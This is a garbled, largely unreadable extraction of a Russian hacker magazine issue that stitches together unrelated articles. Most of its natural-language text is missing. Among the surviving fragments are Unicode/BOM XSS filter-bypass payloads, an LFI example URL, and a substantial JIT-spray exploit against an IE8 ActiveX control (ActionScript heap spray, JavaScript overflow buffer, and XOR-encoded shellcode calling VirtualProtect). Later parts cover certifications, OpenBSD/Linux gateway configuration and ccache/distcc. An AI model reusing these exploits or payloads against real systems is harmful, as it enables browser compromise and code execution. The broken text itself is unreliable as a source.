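        else if (b == 0xF4) { need = 3; hi = 0x8F; }  /* above 8F: > U+10FFFF */
        else if (b >= 0xF1 && b <= 0xF3) need = 3;
        else return 0;            /* 80..C1 and F5..FF cannot start a sequence */

        if (n - i - 1 < need) return 0;               /* truncated sequence */
        if (s[i + 1] < lo || s[i + 1] > hi) return 0;
        for (size_t k = 2; k <= need; k++)
            if ((s[i + k] & 0xC0) != 0x80) return 0;
        i += need + 1;
    }
    return 1;
}

/* Validate first, then look for the quote: 1 only if the input is well-formed
 * and holds no ASCII apostrophe. A constructed policy for the demo; it stands
 * for "check the bytes in their final form, before any further decoding". */
int safe_for_quoted_context(const unsigned char *s, size_t n)
{
    if (!utf8_wellformed(s, n)) return 0;
    for (size_t i = 0; i < n; i++)
        if (s[i] == 0x27) return 0;
    return 1;
}

int main(void)
{
    const unsigned char overlong[] = { 0xC0, 0xA7 };          /* %c0%a7 */
    const unsigned char stray[]    = { 'x', 'x', 'x', 0xF6 }; /* xxx%f6 */

    printf("lenient C0 A7 -> 0x%02X\n", lenient_decode2(0xC0, 0xA7));
    printf("strict  C0 A7 well-formed: %d\n", utf8_wellformed(overlong, 2));
    printf("strict  xxx F6 well-formed: %d\n", utf8_wellformed(stray, 4));
    return 0;
}
```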
,
PHP,
. ,
WAF/IPS
,
,
ASCII-. :
<sc\uFEFFript>aler\uFEFFt('XSS')</scr\uFEFFipt>

\uFEFF ,
.

,
,
.
, , \uFEFF BOM,
.
FireFox mozilla.org/security/
announce/2008/mfsa2008-43.html

, ,
,
IDS/IPS, WAF
. bestfit mapping .
,
, - .
,
.

, , ,
.
.
best-fit mapping
. - ,


, .
,
.
,

45 Unicode-Buffer
Overflows, Unicode-.

Fiddler -
.
U+2032 . ,
, .
, (Chris
Weber),

best-fit?
, .

, .
,
:
−moz−binding: url(http://nottrusted.com/gotcha.xml#xss)

,
,
U+2212. best-fit,
U+002D, ,
CSS-, XSS-.
,
.
, .
,
JavaScript ,
, SQL-.

,
.

. ,
. ,

:
1.

.
2. NFC
,
.
3. .
,
.
,
,
. :). ,
,

. .
:
ABC
ASCII:
\x41\x42\x43
Unicode:
\x41\x00\x42\x00\x43\x00

- ,

ASCII-,
. , -

.
, Unicode-
. (Chris Anley),
, .
,

venetian exploit.

-, ,
, , .


. , ,
,
, ,
.
(
) ,
.

,
,

, UTF-8,
, ..

XSS
.
,
, ,
. ,
.
, .
,
, , ,
.

HAPPY END?!

, ,

. .
,
, .
, . ,
,

. ,

.
,
.z



, Digital Security dookie@inbox.ru

JIT SPRAY

IE8
JIT-

hardware DEP ASLR IE8


JIT Spray. , JIT-,
, , - .

,
ASLR+DEP IE8 . Aurora,
Google,
IE,
IE6/IE7.
, 2010
BlackHat DC 2010 ,
ASLR, DEP IE8. ,
,
,
.
,
. Immunity
Canvas
Aurora IE8
Windows 7. , -,
.
.

PREVIOUSLY ON ][.

][,
,
hardware DEP.



.
ActiveX,
,
. ,
ActiveX emsmtp.dll
QuikSoft EasyMail.

SubmitToExpress().
256 ,
,
ESI, SEH.
cccc260ccccAAAAffffBBBBfffffffff
fffffffffffffffffffffffDDDD
ESI = AAAA
RET = BBBB
SEH = DDDD

IE8 !

IE8 hardware DEP.



.
,
DEP iexplore. Heap Spray

. .
, IE.
Flash,
.
, . DEP .
, IE8 permanent
DEP. DEP
SetProcessDEPPolicy,
NtSetInformationProcess. DEP.
NtSetInformationProcess
Access Denied.
ASLR,
, . 256 .

JIT SPRAY

.
(Dionysus Blazakis)
BlackHat DC 2010 , DEP ASLR
IE8.
- , , . ,
,

Permanent DEP

permanent DEP? JIT-,


. JIT-
ActionScript.
AS ,
SWF-. Flash ,
IE8. ,
, , .
Flash , .

, . ,
. ActionScript ,

cmd.exe. .
, ActionScripte
var ret=(0x3C909090^0x3C909090^0x3C909090^0x3C909090^ );

:
0x1A1A0100: 359090903C XOR EAX, 3C909090
0x1A1A0105: 359090903C XOR EAX, 3C909090
0x1A1A010A: 359090903C XOR EAX, 3C909090
0x1A1A010F: 359090903C XOR EAX, 3C909090

? 0x35 XOR EAX,


.

, , , , :
0x1A1A0101: 90 NOP
0x1A1A0102: 90 NOP
0x1A1A0103: 90 NOP
0x1A1A0104: 3C35 CMP AL, 35
0x1A1A0106: 90 NOP
0x1A1A0107: 90 NOP
0x1A1A0108: 90 NOP
0x1A1A0109: 3C35 CMP AL, 35

0x3C , ,
CMP AL. ,
XOR EAX 0x35. , XOR , NOP ,
NOP .
,
ActionScript.
.
,
. , Flash
? ASLR,
. . -,

JIT-,
HeapSpray.
, .
ASLR, .
100% Windows XP SP3
, Windows 7. -,
ActionScript
.
XP SP3, .
, ,
. ,
Tamarin (
Flex SDK),
SWFTOOLS.

, :
, MetaSploit, .
. JIT- XOR EAX.
.
XOR.
.
, , ,
. . ,
:
1. (, MetaSploit)
ActionScript.
2.
.
3. JIT-Spray. JIT .
4. JIT-Spray.
5. JIT VirtualProtect.
6. JIT VirtualProtect
.
7. JIT ,
MetaSploit.
ActionScript.
, HeapSpray. ,
, \x11\x22\x33\
x44, AS : \u2211\
u4433. (
),
perl AS.
,
JIT- , , .
Dictionary.
Dictionary -,
. :

HTTP://WWW
links
HeapSpray
Flash:
roeehay.
blogspot.com/2009/08/
exploitation-ofcve-2009-1869.html

:
semantiscope.com/
research/BHDC2010/
BHDC-2010-Paper.pdf

JIT-SPRAY :
dsecrg.com/pages/pub/
show.php?id=22
SWFTOOLS:
swftools.org

var dict = new Dictionary();


var key = "key";



dict[key] = "Value1";
dict["key"] = "Value2";


()
, .
, key . 32 ,
3 , 29 .
.
Integer, 29 ,
3 . ActionScript
, .
Dictionary, ,

,
.
,
, ,
. .
Dictionary
,
.
( :)).
var shellcode="shellcode";
var even = new Dictionary();
var odd = new Dictionary();
//
for (i = 0; i < (1024 * 1024 * 8);
i += 1) {
even[i * 2] = i;
odd[i * 2 + 1] = i;
}
//
even[shellcode] = 1;
odd[shellcode] = 1;

,
, .
for (curr in even) {
//
if (curr == shellcode)
{ break; } //
evenPrev = curr;
}
for (curr in odd) {


if (curr == shellcode)
{ break; }
oddPrev = curr;
}

Dictionary
, , .

, ,
17 , (

-).
.
//ptr

if (evenPrev < oddPrev) {
ptr = evenPrev;
if (evenPrev+8+9 != oddPrev)
{ //
return 0;
}
} else {
ptr = oddPrev;
if (oddPrev+8+9 != evenPrev) {
return 0;

}
}
ptr = (ptr + 1) * 8;//
3 8:
(ptr<<3)+8

,
12, .
JIT Spray! , SWF
. ,
.
, , Flash .
,
.
JavaScript .
function pageLoadEx(){
var ldr = new Loader();
var url = "jit_s0.swf";
// JIT-
var urlReq = new
URLRequest(url);
ldr.load(urlReq);
childRef = addChild(ldr);
}
function pageLoad(){
for(var z=0;z<600;z++) {
pageLoadEx();

} // 600
ic=ic + 1;
MyTextField1.text=ic +
"- JIT spraying, wait for 4 ...";
if (ic == 4) {
//4 600
clearInterval(ldInt);
MyTextField1.text = ic +
"- done, calling sploit...";
ExternalInterface.call(
"exploit", ptr);
//
}
}
ldInt=setInterval(pageLoad,3500);
//


. :
JIT-, ,
,
.
: JIT
,
ASCII-,

. ,
.
. , 0x01FF001A.
.
: 0x606F6061 0x616F606A.

. [0x60..0x6F]
. JIT ((0x606F6061-0x60606060)<<4)+(0x616F606A-0x60606060)=0x01FF001A. ,
8 , retn 8.
, :

var bf=unescape("%63");
// ...260...cccccc

DDDD
var value=targetValue;

3
: retn, retn 4 retn 8.
,
12 . . ,
SWF JIT-
,

.
,
,
0x1000 .
0x010000
. 0x1000 ,

. ASLR,
.
0x1A1A0101.
0x1A1A0000,
,
, JIT-. Flash,
. :

value=decimalToHex(value,8,16);
//

var h11="%6"+value.substring(0,1);
var h12="%6"+value.substring(1,2);
var h21="%6"+value.substring(2,3);
var h22="%6"+value.substring(3,4);
var h31="%6"+value.substring(4,5);
var h32="%6"+value.substring(5,6);
var h41="%6"+value.substring(6,7);
var h42="%6"+value.substring(7,8);
//
var high=h41+h31+h21+h11;
var low =h42+h32+h22+h12;
//
while (buf.length<260) buf=buf+bf;
buf+=unescape("%0a%0a%1a%1a");
// ESI 0
buf+="ffff"+unescape("%01%01%1a%1a");
// = 0x1A1A0101 JIT
buf+=unescape(high); //if ret
buf+=unescape(high); //if ret 4
buf+=unescape(high); //if ret 8 (

var buf="";

emsmtp.dll - ret 8)
buf+=unescape(low);

// 16-

buf+=unescape(low);

function decimalToHex(d,l,rad) {

buf+=unescape(low);

var hex = Number(d).toString(rad);

cccc260ccccAAAAffffBBBBCCCCCCCCCCCCDDDDDDDDDDDD

alert('Try me on 0x' + decimalToH

while (hex.length < l) {


hex = "0" + hex;

ex(targetValue,8,16)+' :-)');
vuln.SubmitToExpress(buf); //

ESI = AAAA 0,
JIT-spray
RET = BBBB JIT


return hex;

}
//
function exploit2(targetValue){

function exploit(targetValue) {


JIT , PUSH'a
setTimeout('exploit2('+targetValue+')',5000);
//
}

JIT-SPRAY

JIT-. ,
.
1. 0x7F.
, , XOR
, .
0x00 0x7F.
2. , (JNE/JE, ), Z .
,
XOR. XOR CMP, , ,
Z . ,
(
XOR), , Z 0x7F
. ADD, SUB, XOR, OR, AND .. . AL 0,
Z . ,
PUSH 0x6A.
:
0x1A1A0110: 803F6E CMP [EDI], 'n'
0x1A1A0113: 6A35 PUSH 35
0x1A1A0115: 75EF jnz short

3. ,
. 4 ,
XOR 0x35. AL AH.
0x1A1A0110: B80035B1A1 MOV EAX, 0xA1B13500
0x1A1A0115: 3C35 CMP AL, 35
0x1A1A0117: B063C4 MOV AL, C4
0x1A1A011a: 3C35 CMP AL, 35
0x1A1A011c: B163C3 MOV AH, C4
0x1A1A011F: 3C35 CMP AL, 35
0x1A1A0121: 50 PUSH EAX

, .
, . ,
.
function funcXOR1()
{
var jit=(0x3c909090^0x3c909090^ .. // NOP
0x3c44ec83^ // 3583ec443c

sub esp, 44 ;


0x3c90C033^ // 3533C0903c

xor eax, eax

0x3c9030b0^ // 35b030903c

mov AL,

0x3c008b64^ // 35648b003c

mov eax, fs:[eax]

0x3c0c408b^ // 358b400c3c

mov eax,

fs:[eax+C]

0x3c1c408b^ // 358b401c3c

mov eax,

fs:[eax+1C]

0x3c08508b^ // 358b50083c

NEXT: mov edx,

0x3c20788b^ // 358b78203c

mov edi,

30

[eax+08]

[eax+20] ;

3. . , PUSH 0xA1B1C3C4.
5 , 6 XOR,


0x3c90008b^ // 358b00903c

mov eax, [eax]

0x6a6b3f80^ // 35803f6b6a

cmp [edi], 'k' ;

k? "kern"

0x3c90eA75^ // 3575eA903c

jnz short

0x3c904747^ // 354747903c

inc edi, inc edi ;

NEXT:


0x3c90016a^ // 356a01903c push 01 ;

Unicode
//
//
//

0x3cd3ff57^ // 3557ffd33c
0x3c90e7ff); // ,

0x3cb89090^ // 359090b83c mov eax, 3c ..


0x3c900000^ // 350000903c

. 0x40 ,

3500000

0x3c9063b0^ // 35b063903c mov ah, 'c'

function Loadzz2(){ var ret1 = funcXOR1();}

0x3c5074b4^ // 35b474503c mov al, 't' and push "ct\0\0"


// 4
"Virt ualP rote ct\0\0"
// , ,
,

0x3c5cc483^ // 3583c45c3c add esp, 5c ;



0x3c909058^ // 355890903c pop eax ;
0x3c08c483^ // 3583c4083c add esp, 08 ;

0x3cb9905a^ // 355a90b93c pop edx ;

0x3c906060^ // 356060903c
0x3c9060b1^ // 35b160903c
0x3c9060b5^ // 35b560903c ecx 0x60606060
0x3c90c12b^ // 352bc1903c sub eax, ecx
0x3c90d12b^ // 352bd1903c sub edx, ecx ;

0x3c04e0c1^ // 35c1e0043c shl eax, 4 ;


0x3c90c203^ // 3503c2903c add eax,edx ;
0x3c90388b^ // 358b38903c mov edi, [eax] ;

0x3c08c783^ // 3583c7083c add edi, 8 ; 8

0x3c406a54^ // 35546a403c push esp and push 40 ;



,
NOP XOR. ,
,
,
0x1000 = 4000 . 800 ,
NOP, XOR .
.
. ,
JIT , ,
.
DEP IE8, ,
. :
1. .
2. perl.
3. , 'my' 'our'.
3. AS : perl shellcodegen.pl shellcode_file > jit-spray.as
4. SWF : as3compiler X 320 Y 300 M Loadzz1 jitspray.as
5. , . ,
, Flash.
6. HTML SWF WEB .
, ActiveX
. ,
IE8, .
PDF . z



icq 884888

X-TOOLS

: LIBrute
: WINDOWS 2000/2003/XP/VISTA/7
: [X26]VOLAND

. ,
LFI http://site.com/index.
php?page=news&lang=[]%00,
:
1. URL: http://site.com/index.
php?page=news;
2. : GET;
3. : lang;
4. : {STR}%00;
5. : .
:)
: https://
forum.antichat.ru/thread49775.html.

: HTTPREQ
: WINDOWS 2000/2003/XP/
VISTA/7
: [X26]VOLAND


,
Local File
HttpREQ.
Include,
InetCrack
][ .

, [x26]VOLAND .

:
HTTP GUI-;
.

:
;
GUI;
SSL;
HTTPS;
;
(HTTP/HTTPS);
;
;
URL Decimal ;
;

;
;
4 (Query String, GET, POST,
COOKIE);
;
;
2 (
HttpREQ
);
;
;
;
,

;
;
URL Host
;
;
URL;
POST-
; (Content-length);
Url

Hex ( SQL-).
User-Agent;


!
HTTP;

MIME-;
HTTP-;

;
-;

;
;
;

;
.NET Framework > 2.0;
-
HttpREQ,
https://forum.
antichat.ru/thread121239.html.

: WINDOWS UNLOCKER
: WINDOWS 2000/2003/XP/
VISTA/7
: DJFLY

win.lock,
Windows
SMS NNNN, ,

(
).


DjFly
Windows unlocker.
:
1. (

);
2. ;
3. ;
4. ;
5. IE DrWeb
CureIt ( );
6. ;
7.
;
8.
;
9.
(
);
10. ( );
11. (
);
12. ;
13. *.scr ;
14. hosts.
, , : CD/
DVD/USB , WinUnlocker.exe,
autorun.inf:
[AutoRun]
UseAutoPlay=1
shellexecute=WinUnlocker.exe
action= Windows unlocker
action=@WinUnlocker.exe
label=Windows unlocker
icon=WinUnlocker.exe
Shell\cmd1= Windows unlocker
Shell\cmd1\Command = WinUnlocker.exe

: DICHECKER
: WINDOWS 2000/2003/XP/VISTA/7
: PROXY-BASE.ORG
.
, DiChecker Socks 4/5
HTTP Proxy-,

PHP-


. ,
.
:

;
;
( );
URL (
);
( );
.
proxy-base.org.

: PPROXY
: *NIX/WIN
: BONS

-
-, , -, pproxy.
, pproxy : , PHP (pproxy.php), ,
Perl (plocal.pl),
HTTP-.
. , pproxy.php http://
site.com/proxy/pproxy.php,

( 8008):
perl plocal.pl -px http://site.com/proxy/pproxy.php

: - pproxy.
php (http://site1.com/proxy/pproxy.php http://
site2.com/proxy/pproxy.php),

:
perl plocal.pl -px http://site1.com/proxy/pproxy.php
perl plocal.pl -px http://site2.com/proxy/pproxy.php -tpx http://localhost:8008 -bp 8009

8009
localhost site1.com
site2.com target.

Tor.
Tor+Privoxy (
8118):
perl plocal.pl -px http://site.com/proxy/pproxy.php -tpx http://localhost:8118

,
,
pproxy.php:
$secret = 'pproxypass';

plocal.pl :
perl plocal.pl -px http://site.com/proxy/pproxy.php -pwd pproxypass

pproxy , Delphi/Pascal
.

: XXTEA CRYPTOR
: *NIX/WIN
: OZA

XXtea Cryptor php-,


php-
xxtea, base64.
XXtea
XTEA, 1998
.
64
,
,
32- (
http://ru.wikipedia.org/wiki/
XXTEA).

,
. z



Mifrill maria.nefedova@glc.ru

,
?. ,
, , ,
, ,
, ,
\ , .
,
, ,
.
, IT-
,
, ,
. , ,
:
IT-
, .
, ?
:
,
, .
,
,
. ,
,



,
.
,

.


, ,
(-,
,
).


,
,
.
, , , ,
-,
. ,

IT .

,
, 15 !

. .
, ,
,
.
,
, .

,
,
-
.
, IT
.
-,

(Oracle, Microsoft, Cisco ..), ,
,

. ,

IT-, , .
, ,
.
? ,
-, ,


, .
, , ,
, ,
.

, (,
, ).
-,
, IT- , 5-7


. -, :).
, ,
,
,

profit.

, ,
: ,
. ,


.
,
.

,
.
, .
,
IT-
-
. ,

- , (Microsoft, Red
hat, HP, Cisco, Oracle ).


MS.
, ? ,
,
,
. ,
, ,
, .
,
,
,
Sun
Certified Developer For Java Web Services
, .
,
,
,
,
.
IT-
-.

, .
,
( ),
, -
,
, ,
.
, IT- , ,
.

.

MICROSOFT

,
. ,
, , (
) ,
.
MS :
:
,
, ,
,
Microsoft;


- LPI LEVEL 2
: ,

,
;
:


Microsoft;
:
,
, .

.
,
Office 2007 Microsoft SQL
Server 2008 .
,
www.
microsoft.com/Rus/Learning/MCP/Default.mspx

RED HAT


, Red Hat, , .
40
, .
Red
Hat Enterprise Linux, Red Hat Linux Fedora
Core, .
Red Hat
:
Red Hat Certified Technician (RHCT);
Red Hat Certified Engineer (RHCE);
Red Hat Certificates of Expertise;
Red Hat Certified Security Specialist (RHCSS);
Red Hat Certified Datacenter Specialist
(RHCDS);
Red Hat Certified Architect (RHCA).
, Red Hat
,
,

Red Hat. ,
, ,
.

Red Hat : www.europe.
redhat.com/training


.
MICROSOFT.

LINUX
PROFESSIONAL
INSTITUTE (LPI)


Linux Professional Institute (LPI).
GNU/Linux GNU/Linux-, - ,
.

. :
LPIC Level 1
:
101: General Linux I;
102: General Linux II.
LPIC Level 2
:
201: Advanced Administration;
202: Linux Optimization.
, :
LPIC Level 3
:
321: Windows Integration;
322: Internet Server;
323: Database Server;
324: Security, Firewalls, Encryption;
325: Kernel Internals & Device drivers;
Creating distribution packages;
32x: .

: www.lpi.org.

CISCO

Cisco Systems
80% ,

.
Cisco


CISCO.
,
. ,
Cisco .
Microsoft ,
:
Entry, Associate, Professional, Expert,
Specialist.

CCIE (Expert).
:
Routing & Switching, Design, Network Security,
Service Provider, Storage Networking, Voice,
Wireless.
Cisco ,
( , )
. ,
.

: www.cisco.com/web/go/
certifications

COMPTIA (Computing
Technology Industry
Association)



CompTIA. ,
, 28-
.
CompTIA
:
CompTIA A+ ( ,
IT-);
CompTIA Network+;
CompTIA Security+;
CompTIA Server+;
CompTIA Linux+;
CompTIA PDI+;
CompTIA RFID+;
CompTIA Convergence+;
CompTIA CTT+;
CompTIA CDIA+;
CompTIA Project+.
,

IT Fundamentals,

EC-COUNCIL.
,
.

ADOBE

, ,
IT IT for Sales,
Green IT,
.
: www.comptia.org

ORACLE

Oracle
Sun Microsystems, Oracle ,
, Java .

: Certified Associate,
Certified Professional, Certified Master, Special
Accreditation, Certified Expert Program
Certified Specialist.
,
, ,
, ,

: www.education.
oracle.com/pls/web_prod-plq-dad/db_pages.
getpage?page_id=39

1C

1
. ,
IT- . , ,
1 ,
, , .
, , :).
1: ,


1:.
1: 8
1: 7.7.
: www.1c.ru/prof/
prof.htm

,
,
.
Adobe Systems Incorporated, ,
,

.
Adobe :
Adobe Certified Expert (ACE), Adobe Certified
Associate (ACA) Adobe Certified Instructor
(ACI).
ACE -
Adobe, ACA ,

Adobe, ACI, ,
.
: www.adobe.com/support/
certification

, ,
,
,

.
, 99% , ,
,
, , , ,
. , , ,
,
-
.



,
,
,
,


EXCEL 2000


.



:
. .. : www.
specialist.ru;
,
& Softline Academy: www.ituniversity.ru.
,
, . ,
Thomson Prometric: www.prometric.com VUE:
www.vue.com.
,
,

, .

, ,
, , ,
, . ,
strike back, .

COPMTIA

,
(
),
, , .

.
, ,
,
.

,
IT
IT, . ,

, ,
-
.

, COMPTIA


,
, , IELTS:
International English Language Testing
System, TOEFL:
Test of English as a Foreign Language.
:
www.ielts.org
: www.toefl.org
,
- ,
.
Mensa

.
,

,

, IQ , 98%
. , ,
, 100 .
- :).
: www.mensa.org


(Certified Ethical Hacker), International Council of E-Commerce
Consultants (EC-Council).
,
, , ,
.
,
: www.eccouncil.
org/certification/certified_ethical_hacker.aspx z


UNIXOID
grinder grinder@ua.fm

Windows
*nix-,

,
.
, , , .
*nix, .
, .

Windows
Firewall Internet Connection Sharing (
) ,
. ,
, , , ,
UserGate Proxy & Firewall, NetworkShield
Firewall Kerio WinRoute Firewall. ,
,
, .

, ,
. ,


(, ,
, ). .

. ,
,
,

,
Windows Firewall, .

, ,

. ,
, DNS

(,
IDS, VPN IP-PBX). ,

,
Linux
,
BSD . , OpenBSD
,
32-64 300 , ,
, ,
.
PF
OpenBSD iptables Linux.
VirtualBox (virtualbox.org),
.
QEMU,
Virtual PC . :

VirtualBox
VMware Server ( ),
VMware Player.


,

, VirtualBox Bridged Networking
Driver.
(TCP/IP) Microsoft.
, VirtualBox,
DNS- IP-
(LAN) , (vic1 OpenBSD
eth1 Linux).
Microsoft.
.

(, Wi-Fi), . ,
.
, ,
.

PACKET FILTER

:
# sysctl net.inet.ip.forwarding=1

,
/etc/sysctl.conf.

NAT, pf.conf:
# vi /etc/pf.conf
nat on vic0 from vic1:network to any -> vic0
block in all
pass in on vic1

, vic1, .
.
:
# pfctl -nf /etc/pf.conf
# pfctl -vf /etc/pf.conf


PF,

IP-. NAT, :
# pfctl -s state


IP ( )
nmap . , ,
,
:
# vi /etc/pf.conf
tcp_srv = "{ ssh, smtp, domain, www, pop3 }"
udp_srv = "{ domain }"
block all
pass out inet proto tcp to any port $tcp_srv
pass out inet proto udp to any port $udp_srv

/etc/services
, .
pfctl
:

WARNING

warning

VirtualBox
ISO
OpenBSD (install46.
iso),


,
.

# pfctl -s info


ntop pftop. PKG_PATH FTP- (www.
openbsd.org/ftp.html), :
# export PKG_PATH=ftp://ftp.openbsd.org/pub/OpenBSD/4.6/packages/i386

HTTP://WWW
links
VirtualBox
www.virtualbox.org
FTP
OpenBSD www.
openbsd.org/ftp.html

:
# pkg_add pftop
# pkg_add ntop

Dnsmasq
thekelleys.org.uk/
dnsmasq


,

- Squid.


OpenBSD ,

# pkg_add squid-2.7.STABLE6.tgz

/etc/squid/
squid.conf :
# vi /etc/squid/squid.conf
http_port 3128
### :
# http_port 127.0.0.1:3128 transparent
### IP

acl lan_net src 192.168.1.0/24


###
192.168.1.0/24
http_access allow lan_net
###
, VM
cache_mem 32 MB
maximum_object_size 10240 KB
cache_dir ufs /var/squid/cache 5000 16 256

:
# squid -z
# squid

,
:
# netstat -ant | grep 3128


3128 vnec1

-. , , ,
80 8080
web-, ,
Squid:
# vi /etc/pf.conf
table <clients> { 192.168.1.2,
192.168.1.5 }
table <nocache> { 192.168.1.0/24 }
rdr on inet proto tcp from <clients>
to ! <nocache> port { 80 8080 } ->
127.0.0.1 port 3128

, Squid :
# vi /etc/rc.local
if [ -x /usr/local/sbin/squid ]; then
echo -n 'squid'; /usr/local/sbin/squid
fi

# pkg_add privoxy

,
8118,
http://config.privoxy.org/ ( : http://p.p).
-.
Cookies, pop-up,
. Privoxy
,
LAN
listen-address config.txt, IP
vic1:
listen-address 192.168.1.1:8118

Squid . squidGuard
(www.squidguard.org) HAVP (HTTP Anti Virus
Proxy, www.server-side.de).
,
,
.
# pkg_add squidguard
# pkg_add havp

IPTABLES

iptables -F ,
iptables -t nat --flush NAT
iptables -L


squidGuard HAVP ,
][ 2008
, .
,
,
. ,
,
. -
. ,
Squid, Privoxy (Privacy Enhancing Proxy, privoxy.
org)
-.
Privoxy
:

, , Privoxy
,
, ][ 03.2007.
,
squid.conf
:
cache_peer 127.0.0.1 parent 8118 7 no-query

DNS ( TFTP
DHCP) Dnsmasq (thekelleys.org.uk/
dnsmasq). :

sysctl.conf
# pkg_add dnsmasq

dnsmasq.conf ,
:
listen-address=127.0.0.1, 192.168.1.1

DNS-
.

IPSEC OPENBSD
VPN.
IPsec ipsecctl, . ,
192.168.1.0/24, WAN
IP- 1.2.3.4,
LAN - 192.168.2.0/24 WAN 5.6.7.8.
/etc/ipsec.conf :

# vi /etc/ipsec.conf
ike esp from 192.168.1.0/24 to 192.168.2.0/24 \
peer 5.6.7.8
ike esp from 1.2.3.4 to 192.168.2.0/24 \
peer 5.6.7.8
ike esp from 1.2.3.4 to 5.6.7.8

# vi /etc/pf.conf
set skip on { lo vic1 enc0 }
pass quick on vic0 from 5.6.7.8

VPN-
/etc/isakmpd/pubkeys/ipv4/5.6.7.8, /etc/isakmpd/
private/local.pub 5.6.7.8. :
# isakmpd -K
# ipsecctl -f /etc/ipsec.conf

,
( ).
/etc/rc.conf.local :

INFO

info
Ubuntu Server 9.10

192
1
(ubuntu.
com/products/
whatisubuntu/
serveredition/
techspecs).

isakmpd="-K"

C OpenBSD, , . Linux,
, , .

NAT LINUX
Linux Netfilter
iptables. , , , .
:


,
,


,

][
2009 .

# echo 1 > /proc/sys/net/ipv4/ip_forward

/etc/ipsec.conf ,
IP
passive, , ( ):
ike passive esp from 5.6.7.8 to 1.2.3.4

PF
, ,
,
:

:
# sysctl -w net.ipv4.ip_forward=1

,
/etc/sysctl.conf:
net.ipv4.ip_forward = 1

, sysctl
OpenBSD. -


down.d). , /etc/network/interfaces :
# vi /etc/network/interfaces
###
pre-up iptables-restore < /etc/iptables.rules

CentOS :
# service iptables save

/etc/
sysconfig/iptables.
/etc/sysconfig/
iptables-config:
# vi /etc/sysconfig/iptables-config
IPTABLES_SAVE_ON_STOP="yes"
IPTABLES_SAVE_ON_RESTART="yes"

Privoxy -
.
CentOS/Fedora
:
# system-config-securitylevel

# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
# iptables -A FORWARD -i eth0 -o eth1 \
    -m state --state RELATED,ESTABLISHED -j ACCEPT
# iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT

iptables
:
# iptables -L -v

, .
. Squid . Debian/
Ubuntu:
# apt-get install squid

# service iptables status


chkconfig.
iptables:
# chkconfig --list iptables

:
# chkconfig iptables on

( )
eth1, eth0. NAT
Linux ,
:


:
iptables -A OUTPUT -j ACCEPT -m state \
    --state NEW,ESTABLISHED,RELATED -o eth0 -p tcp \
    -m multiport --dports 80,443,8080 --sport 1024:65535

# yum install squid

,
iptables:

NAT ,
Ubuntu iptables
iptables-save:

iptables -t nat -A PREROUTING -i eth1 -p tcp -m tcp --dport 80 \
    -j DNAT --to-destination 192.168.1.1:3128

# iptables-save > /etc/iptables.rules

iptables -t nat -A PREROUTING -i eth0 -p tcp -m tcp --dport 80 \
    -j REDIRECT --to-ports 3128

, (,
/etc/network/if-post-

PFCTL
pfctl -f /etc/pf.conf pf.conf
pfctl -nf /etc/pf.conf
pfctl -Nf /etc/pf.conf NAT
pfctl -Rf /etc/pf.conf
pfctl -sn NAT
pfctl -sr
pfctl -ss
pfctl -si
pfctl -sa


CentOS:

Squid Adzapper (adzapper.sf.net),


squidGuard HAVP.


,
Windows ,
. ,
- ,
, .

, .z

zobnin@gmail.com


ccache distcc


. , ,
( BSD Gentoo).
, .
,
, .

,
, .


.


,
.
,
.

~/.bashrc:
export CFLAGS='-O0'
export CXXFLAGS=$CFLAGS

FreeBSD Gentoo /etc/make.conf :


gcc, g++, cc c++ distcc

ccache -s

ccache FreeBSD

CFLAGS='-O0'
CXXFLAGS='-O0'

OpenBSD /etc/mk.conf.
,
, . , ,
, - ,
, ,
.

.
,
- .
make , . Make
'-j',
( ,
, ). ,

. , , '-j' . ,
, .
,

2.
'-j'
:
$ ./configure
$ make -j5
$ sudo make install

, , , .
, Gentoo make MAKEOPTS /etc/make.conf. FreeBSD
MAKE_ARGS.
source based
, 10%.
, ,
, tmpfs.
, .
/var/tmp, tmpfs. Gentoo:
$ sudo mount -t tmpfs tmpfs -o size=1G,nr_inodes=1M /var/tmp/portage

,
(2 ), tmpfs swap,
.
,
.


.
, , ,
.
,
,
.
ccache.
ccache ,
. ,
, ,
.
Ccache .
.
ccache

:
$ CC="ccache gcc" CXX="ccache g++" ./configure


Samba
ccache

distccmon-gnome


~/.ccache.
1 ,
4 :

ccache.
ccache genkernel, :

$ ccache -M 4G


, ccache
:
$ echo "export CCACHE_DIR=\"/var/tmp/ccache/\"" >> ~/.bashrc
:
$ rm -rf ~/.ccache
$ ln -s /var/tmp/ccache ~/.ccache

$ sudo genkernel --kernel-cc=/usr/lib/ccache/bin/gcc --menuconfig all

FreeBSD ,
:
1. ccache:
$ cd /usr/ports/devel/ccache
$ sudo make install clean
2. /etc/make.conf:
$ sudo vi /etc/make.conf

ccache ,
. ,
, , , .
ccache . ,

. ccache:
Gentoo FreeBSD.
ccache Gentoo
:
1. ccache:
$ sudo emerge -av ccache

# NO_CACHE
, ccache
.if !defined(NO_CACHE)
CC=/usr/local/libexec/ccache/world-cc
CXX=/usr/local/libexec/ccache/world-c++
.endif
# ccache
.if ${.CURDIR:M*/ports/devel/ccache}
NO_CCACHE=yes
.endif

# ccache
FEATURES="ccache"
#
CCACHE_DIR="/var/tmp/ccache/"
#
CCACHE_SIZE="4G"

info

Gentoo


(. /etc/
portage/package.
cflags).

ccache
distcc .

PORTAGE_NICENESS
/etc/make.
conf
Gentoo
,


.

2. ~/.cshrc ( ~/.bashrc):
$ sudo vi ~/.cshrc

2. /etc/make.conf:
$ sudo vi /etc/make.conf

INFO

# ccache
setenv PATH /usr/local/libexec/ccache:$PATH
setenv CCACHE_PATH /usr/bin:/usr/local/bin
setenv CCACHE_DIR /var/tmp/ccache
setenv CCACHE_LOGFILE /var/log/ccache.log
#
if ( -x /usr/local/bin/ccache ) then

ccache
distcc
.
Gentoo

,

FEATURES="ccache
distcc" /etc/
make.conf.


/usr/local/bin/ccache -M 4G > /dev/null


endif

ccache make install clean:

, ,
distcc-config ( ,
DISTCC_HOSTS):
$ sudo distcc-config --set-hosts "127.0.0.1 192.168.0.1 192.168.0.2 192.168.0.3"

$ sudo make NO_CACHE=yes install clean


.
( ),
,
. ,
distcc.
Distcc gcc,

. , distcc

- . ,
-
.
distcc
. ,
, ,
. , ,
.
- . , ,
Linux, *BSD, Solaris Windows ( gcc
distcc cygwin), gcc
.
distcc , .
Gentoo FreeBSD
. Gentoo
distcc, .
distcc :
$ sudo emerge distcc

- /etc/make.
conf:
$ sudo vi /etc/make.conf
#
MAKEOPTS="-j8"
# distcc
FEATURES="distcc"
# distcc
DISTCC_DIR="/tmp/.distcc"

MAKEOPTS . :
/ * 2 + 1.
